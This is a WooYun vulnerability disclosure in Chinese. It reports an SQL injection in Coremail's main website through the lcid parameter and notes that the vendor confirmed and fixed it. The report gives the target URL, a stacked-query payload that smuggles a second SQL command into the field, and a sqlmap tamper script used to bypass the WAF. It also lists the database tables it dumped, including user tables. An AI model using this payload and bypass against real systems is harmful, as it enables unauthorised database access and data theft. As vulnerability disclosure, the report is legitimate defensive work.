当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0127367

漏洞标题:coremail盈世主站存在SQL注入漏洞(waf可被绕过)

相关厂商:Coremail盈世信息科技(北京)有限公司

漏洞作者: 路人甲

提交时间:2015-07-20 17:30

修复时间:2015-09-05 15:08

公开时间:2015-09-05 15:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-20: 细节已通知厂商并且等待厂商处理中
2015-07-22: 厂商已经确认,细节仅向厂商公开
2015-08-01: 细节向核心白帽子及相关领域专家公开
2015-08-11: 细节向普通白帽子公开
2015-08-21: 细节向实习白帽子公开
2015-09-05: 细节向公众公开

简要描述:

盈世主站存在sql注入漏洞

详细说明:

盈世主站存在sql注入漏洞,做了一定程度的防护,但可以使用sqlmap中的chardoubleencode.py,tamper脚本进行绕过。

漏洞证明:

首先是连接:http://www.coremail.cn/gjzc/index_104.aspx?lcid=66
注入点是lcid

Place: GET
Parameter: lcid
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
    Payload: lcid=66; IF(8842=8842) SELECT 8842 ELSE DROP FUNCTION gcAK--


直接使用sqlmap注入只能跑出数据库类型

1.jpg


使用chardoubleencode.py脚本进行绕过后可以跑出数据库名、表名和表内数据

2.jpg


3.jpg


共跑出ysxx201412197372库内93个表

+----------------------------+
| Whir_Cmn_Area              |
| Whir_Cnt_Attached          |
| Whir_Cnt_CreateLog         |
| Whir_Cnt_Relation          |
| Whir_Cnt_Subject           |
| Whir_Cnt_SubjectClass      |
| Whir_Cnt_SubjectColumn     |
| Whir_Cnt_WorkFlowLogs      |
| Whir_DevXColumn            |
| Whir_Dev_Field             |
| Whir_Dev_Form              |
| Whir_Dev_FormArea          |
| Whir_Dev_FormDate          |
| Whir_Dev_FormOption        |
| Whir_Dev_FormUpload        |
| Whir_Dev_Menu              |
| Whir_Dev_Model             |
| Whir_Dev_Module            |
| Whir_Dev_Plugin            |
| Whir_Dev_SubmitForm        |
| Whir_ExsPBackup            |
| Whir_Ext_AuditActivity     |
| Whir_Ext_Collect           |
| Whir_Ext_CollectField      |
| Whir_Ext_Gather            |
| Whir_Ext_GatherTable       |
| Whir_Ext_OperateLog        |
| Whir_Ext_SendEmailRecord   |
| Whir_Ext_SensitiveWords    |
| Whir_Ext_Tools             |
| Whir_Ext_Upload            |
| Whir_Ext_WorkFlow          |
| Whir_Mem_Member            |
| Whir_Mem_MemberGroup       |
| Whir_Oa_NewsConfig         |
| Whir_Oa_NewsTemp           |
| Whir_Plu_Advert            |
| Whir_Plu_AdvertPosition    |
| Whir_Plu_SiteMap           |
| Whir_Sec_Resources         |
| Whir_Sec_Roles             |
| Whir_Sec_RolesInResources  |
| Whir_Sec_Users             |
| Whir_Sit_SiteInfo          |
| Whir_U_Category            |
| Whir_U_Category_Bak        |
| Whir_U_Content             |
| Whir_U_Content_Bak         |
| Whir_U_Content_Category    |
| Whir_U_Download            |
| Whir_U_Download_Bak        |
| Whir_U_Download_Category   |
| Whir_U_Feedback            |
| Whir_U_FeedbackXBak        |
| Whir_U_Forms               |
| Whir_U_Forms_Bak           |
| Whir_U_Jobs                |
| Whir_U_Jobs_Bak            |
| Whir_U_Jobs_Category       |
| Whir_U_Jobs_JobRequest     |
| Whir_U_Links               |
| Whir_U_Links_Bak           |
| Whir_U_Magazine            |
| Whir_U_Magazine_Bak        |
| Whir_U_Magazine_Chapter    |
| Whir_U_Prhduct             |
| Whir_U_Product_Bak         |
| Whir_U_Product_Category    |
| Whir_U_SalesNet            |
| Whir_U_SalesNet_Bak        |
| Whir_U_SinglePage          |
| Whir_U_SinglePage_Bak      |
| Whir_U_SubContent          |
| Whir_U_SubContentPBak      |
| Whir_U_SubContent_Category |
| Whir_U_SubForms            |
| Whir_U_SubForms_Bak        |
| Whir_U_SubPage             |
| Whir_U_SubPage_Bak         |
| Whir_U_SubProduct          |
| Whir_U_SubProduct_Bak      |
| Whir_U_SubProduct_Category |
| Whir_U_Survey              |
| Whir_U_Survey_Answer       |
| Whir_U_Survey_Bak          |
| Whir_U_Survey_Detail       |
| Whir_U_Survey_Question     |
| Whir_U_Vote                |
| Whir_U_Vote_Answer         |
| Whir_U_Vote_Bak            |
| Whir_U_Vote_Detail         |
| Whir_Dev_ConfigStr\x1dtegy |
| Whir_U_Magazine_Inf r      |
+----------------------------+


跑了两个表内的数据验证一下

4.jpg


5.jpg

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-22 15:06

厂商回复:

感谢反馈,已完成对该漏洞的修复。

最新状态:

暂无